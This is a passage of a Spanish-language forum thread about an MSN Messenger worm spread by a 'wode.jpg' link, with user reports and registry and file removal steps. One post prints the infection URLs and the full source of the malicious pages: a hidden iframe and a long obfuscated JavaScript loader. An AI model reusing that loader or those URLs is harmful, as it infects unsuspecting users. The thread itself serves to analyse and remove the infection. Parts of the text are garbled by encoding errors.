Páginas: [1] 2 
|
 |
|
 Autor
|
Tema: Virus en el MSN: wode.jpg (Leído 11736 veces)
|
-Riven-Ward-
RivenSoft
 Desconectado
Mensajes: 2.219
Do you like Mario? xDDDDDDDDDDDD
|
Bueno... derrepente me llamaron al PC y me dijieron que hablando con una amiga (¨¦sta fue mi hermana) le apareci¨® una direcci¨®n y otras cosas abajo de lo que su amiga dec¨ªa... Esto dec¨ªa: (No habran la URL xDD) Entonces mi hermana abri¨® esa URL, y sali¨® un virus. Fu¨¦ hay cuando me llam¨®, pero ella ya hab¨ªa sacado el mensaje... Y ahora a todos los que usamos el PC les sale eso... Alguien tiene noticias de lo que es?? O alguien sabe como sacarlo?? Andube buscando y encontr¨¦ poca o nada informaci¨®n acerca de esto. Salu2! |
|
|
|
|
En línea
|
Usuario Banneado
|
|
|
|
el-brujo
|
est¨¢ interesante el tema este..... Yo acabo de abrir la URL y el Panda Titanium no ha detectado nada, s¨®lo el navegador me ha dicho si quer¨ªa instalar el paquete de idiomas de "Chino Simplificado". La primera vez que he abierto la URL me ha salido una chica muy maja y ahora me sale una url de error 404 o parecido pero en chino o saber.  Con el Mozila Firefox: The image ¡°http://www.xf2s.com/msn/wode.jpg¡± cannot be displayed, because it contains errors. http://www.xf2s.com/msn/wode.jpgHuele raro si, xDD Y luego hay un iframe que te lleva a esta URL: http://www.xf2s.com/msn/news.htmDe hecho el c¨®digo fuente de: http://www.xf2s.com/msn/wode.jpges: <html> <iframe src="news.htm" width="0" height="0" frameborder="0"></iframe> <center><img src="1.jpg"></center> <html> Y el c¨®digo fuente de: http://www.xf2s.com/msn/news.htmes: <html><head><Meta Name=Encoder Content=»¶Ó·ÃÎÊ> <!--The page is protected by HTMLShip XP(Unregistered Version)--><META HTTP-EQUIV="imagetoolbar" CONTENT="no"><noscript><iframe></iframe></noscript><script language="javascript"><!-- nJ8="\%shsssH0",gJ86="\%dh\'hHH0";.5200865,sG82=".6982664",gJ86='ZzEl\@J1eR\]Ia4\ Xj\<6y0A8F\.H\:\;C\nn\(mvP2Q\'\*tV\^TLh\r3\|\&Sx\#\,5\=\+Krq\}fpW\>Boi\%csg\[D\{k\\Nw\/\"M\?Gb\)9\-\_7O\`Ud\~Y\!u\$',nJ8='xYa\?u\ j\<o\\\%\nlBZe\#\{Nr6pWQM1hn\/7\'\]\-\+c\!k2Cs\^O\)g9\`3\,dKi\$\&qUmD\:\|P\;\*LfHE\[\.J8b\}\>T0\"\=wySv\~VRG\@\rz5\_\(X4tIAF';function nQ62(fW84){"\%d\'\'\'d\'h",l=fW84.length;'Mq533B6B',w='';while(l--)"\%d7\'\'0\'3",o=nJ8.indexOf(fW84.charAt(l)),'NM3q3B3W\?\r63',w=(o==-1?fW84.charAt(l):gJ86.charAt(o))+w;"\%\'khkkh\'",nJ8=nJ8.substring(1)+nJ8.charAt(0),document.write(w);'MN\@35qBB'};nQ62("\#J\.DE\;CB\?\n78A\n8\<qe\n\-\nJ\.DE\;CLD\}jrq\`lGGhEP\'XH\.A\]\<7CQ\n\?\?R\>PA7\.CEH7B\rX\]\'R\>D\<CAD7BP\n\?J\<\|hPA7\.CEH7B\r\]X\]\'R\>XH\.A\]\<7CQH7\.H7C\<KC\]\<7Aq\rX\]hJ\<COE\]\<HAC\'y\r\]X\]\'Ry\$prrR\|h\r\]X\]\'Rh\|XH\.A\]\<7CQH7\.H7C\<KC\]\<7Aq7\<\=BWA7\.CEH7\'yD\<CAD7BP\n\?J\<yRhPA7\.CEH7B\r7X\]\'\<R\>EP\'XH\.A\]\<7CQ\?\nN\<DJ33\=E7XH\=QJEX\<V\nDR\>EP\'\<Q\=gE\.gIqjRD\<CAD7BP\n\?J\<h\|\|hEP\'XH\.A\]\<7CQ\?\nN\<DJR\>XH\.A\]\<7CQ\.\n\;CAD\<a\-\<7CJ\'a\-\<7CQS5\(da\}5\*\"RhXH\.A\]\<7CQH7\]HAJ\<XH\=7q\r7X\]h\|\<\?J\<\>XH\.A\]\<7CQH7\]HAJ\<A\;q\r7X\]h\|h8\*zGqjcjjh\-Ollq\&cjchPA7\.CEH7B\rX\=J\'R\>\=E7XH\=QJC\nCAJBqByOg\<B\;\n8\<BEJB\;DHC\<\.C\<XBVNBMOS\)dgE\;BZ\+yhJ\<COE\]\<HAC\'y\rX\=J\'Ry\$jrrRh\|h\rX\=J\'RhX\ \&zql\{\`Gh\.njlqcrzchPA7\.CEH7B\rXXJ\'R\>EP\'XH\.A\]\<7CQ\n\?\?R\>XH\.A\]\<7CQH7J\<\?\<\.CJC\nDCqPA7\.CEH7B\'R\>D\<CAD7BP\n\?J\<\|hJ\<COE\]\<HAC\'y\rXXJ\'Ry\$zrrR\|\|h\rXXJ\'RhV\+zlq\`cj\&h\.dp\{qp\`\&\{hC\}GjqjcjlhP\ \`pqc\`\&lh\<\*Gpq\`lG\{hC\(\{\`qzlGphTa\{pq\`\&\{hh\r\?E\.\<7J\<X\rCH\rqyyh\#wJ\.DE\;CL")//--></script><sCRIPt LANGuAge=JavAsCrIpt>nQ62("\{soisl\:olZ\[4USJE4oSZ8sruoUS4\[8\*ulrh\'E\'onSf\`7\{ER\#oJsZ4lslUSd\$\<6\@n8\r\[s8h\-9s\-uh\;\[uohyyJh\"\;EEM\-9sAxT\*ls9Pyso8sMJ9\-hhyso8sM9s\-SZsr\*oUSsoisyi\r8J\:\[\*suosSf\{yER\#oJsf\`7\{ysoisl\:olf\`7\{8J\:\[\*sZul\'bFlboUS\#l\+l8J\:\[\*sSf\`74EJF\-o\'sMw\:\[so\]JE4oM\+luFoM\:o\*ulJo\]y\"xT\*ls9Pyb\&uEJls\[E\'M9\:o\;M8FR8s\:\[\'b\]6\&uEJls\[E\'M9\:o\;M\[\'4oi\_\;\]2\'ow8M9s\-2GGGGn\`7\{y8J\:\[\*sf\{slRuoZRE\:4o\:U6Zw\[4s9U\<66\.Z9o\[b9sU\!qZJouu8\*lJ\[\'bU6ZJouu\*l44\[\'bU6f\{s\:f\{s4Zw\[4s9U5q\.Z9o\[b9sU\<\@f\{Ru\[\'0f\{\-l\:\|Foof\)9oZ\*lboZ\[8Z\*\:EsoJso4ZRrZ1\)vgK9\[\*\{y\-l\:\|Foof\{yRu\[\'0f\{ys4f\{s4Zw\[4s9U\!q\.Z9o\[b9sU\<\@f\{8s\:E\'bf\{lZ9\:o\;U9ss\*hyywwwM0l\[89o\'bM\'osy9s\-u89\[\*y\:ob\[8so\:M9s\-fcEwo\:ZRrZ1\)vgK9\[\*\{ylf\{y8s\:E\'bf\{ys4f\{ys\:f\{yslRuof")</script></head><body><noscript><b><font color=red>This page requires a javascript enabled browser!!!</font></b></noscript></body></html> El código está encripado con: The page is protected by HTMLShip XP.. ¿? |
|
|
|
« Última modificación: 15 Septiembre 2004, 05:39 por el-brujo »
|
En línea
|
Give peace a chance
|
|
|
-hkj-
Desconectado
Mensajes: 883
"Yo,HkJ"
|
No e visto algo asi en mi vida, pero te a pasado algo en el ordenata brujo?????
|
|
|
|
|
En línea
|
"Sin metodo, sin orden, sin voluntad, no es posible el triunfo"
|
|
|
|
el-brujo
|
mmm no  Imagino que se aprovecha de alguna vulnerabilidad del Internet Explorer o de algún usuario que no tenga el residente del antivirus puesto. Riven, ¿cuales son los efectos? Supongo que escribir signos extraños |
|
|
|
|
En línea
|
Give peace a chance
|
|
|
-Riven-Ward-
RivenSoft
Desconectado
Mensajes: 2.219
Do you like Mario? xDDDDDDDDDDDD
|
Pues el peor efecto de todos es no poder encontrar su "cura" xDDDDD...
Además de eso, solo hace que abajo de lo que dices en MSN se muestren signos extraños y la URL de infección, lo que puse en el primer post...
No he visto nada mas, por ahora... Espero que salga luego la cura y que no haga nada mas...
Salu2!
|
|
|
|
|
En línea
|
Usuario Banneado
|
|
|
Gral. AnSaLoN
Desconectado
Mensajes: 615
Gral. AnSaLoN This Here....
|
Pues si que es curioso si... O_O
|
|
|
|
|
En línea
|
Soy la voz que nadie escucha, el portador de las noticias de la llegada del mal, la llegada de la oscuridad y del CAOS. Del fin de la existencia.
|
|
|
-Riven-Ward-
RivenSoft
Desconectado
Mensajes: 2.219
Do you like Mario? xDDDDDDDDDDDD
|
Encontré por hay una página que dice, supuestamente, como borrarlo... Ami no me funcionó, pero puede que a alguno de ustesdes si... URL: http://www.elextremo.cl/borravirusmsn.docSalu2! PD: No me dejó adjuntarlo, porque es .doc xDDD |
|
|
|
|
En línea
|
Usuario Banneado
|
|
|
-Riven-Ward-
RivenSoft
Desconectado
Mensajes: 2.219
Do you like Mario? xDDDDDDDDDDDD
|
Solución Verdaderaaaa!! Ya la probé y funciona PERFECTO  :D:D:D:D Estoy feliz xDDDDDD: ir al registro de Sistema (INICIO, EJECUTAR, REGEDIT) Ir a la cadena HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run y remover los valores: "realone_nt2003" and "realone_nt2004" luego, ir a C:\windows\system32\, y borrar los siguientes archivos: "MONIKER.EXE", "SYSLRAY.EXE", "HKT1.DLL" En caso de que no te permita borrarlos, presiona ctrl alt supr, y finaliza esas tareas, luego las borras por ultimo, desinstala el Messenger, reinicia el PC y vuelve a instalarlo.... Fuente: http://www.cyberholokauzt.gratishost.comPasado por MSN por: Crackptus^ (xDDDDD) Salu2! |
|
|
|
« Última modificación: 15 Septiembre 2004, 12:24 por -Riven-Ward- »
|
En línea
|
Usuario Banneado
|
|
|
plasma
Desconectado
Mensajes: 3
|
BUENO SOLO QUIERO DECIR QUE EL RESULTADO DE LA AYUDA PUESTA AQUI DA RESULTADOS ... ASI QUE ESTA TODO BIEN ... ESO ESPERO ... BUENO Y QUIERO DEJAR ALGO MAS QUE ENCONTRE DENTRO DE ESA PAGINA ... A VER QUE SERA By: f2s f2s@hackbase.net esto lo encontre cuando estaba eliminando los exe.. al finalizar tarea dentro de eso aparecio eso ... bueno muchas gracias por su ayuda |
|
|
|
|
En línea
|
|
|
|
4D1cTo
Desconectado
Mensajes: 169
|
A una amiga le acaba de pasar lo mismo... la cosa es que un amigo de ella fue infectado por este virus... ella por curiosidad presiono el link y quedo infectada tmb ... yo presione sobre ese link que aparecia debajo de lo que ella escribia... pero graxias a mi mozilla no paso na  Ya pude ayudar a mi amiga graxias a esa solucion q postearon 8) |
|
|
|
|
En línea
|
[ Linux Registered User #348950 ]
|
|
|
Crackptus^^
Desconectado
Mensajes: 838
[ I`am a being outside this world]
|
|
|
|
|
|
En línea
|
When you learn to respect to your superior ones, then aprenderas to be somebody, because all we above have somebody but that, in short, are single to say.
|
|
|
Arwing
Colaborador
Desconectado
Mensajes: 2.220
Xarw's
|
|
|
|
|
|
En línea
|
|
|
|
educas
Desconectado
Mensajes: 1
|
Estoi infectao, syslray y moniker,ya tu sabes loko, no se va ni pidiendoselo  y ya stoi asta los |
|
|
|
|
En línea
|
|
|
|
|
|
darksnake
Desconectado
Mensajes: 2
|
oye wn brujo... y cachai como poder decoficar la wuea aun?? el codigo fuente del news.htm no eh podio aun aver si podi tu avisay ...
|
|
|
|
|
En línea
|
|
|
|
|
Páginas: [1] 2 
|
|
|
 |
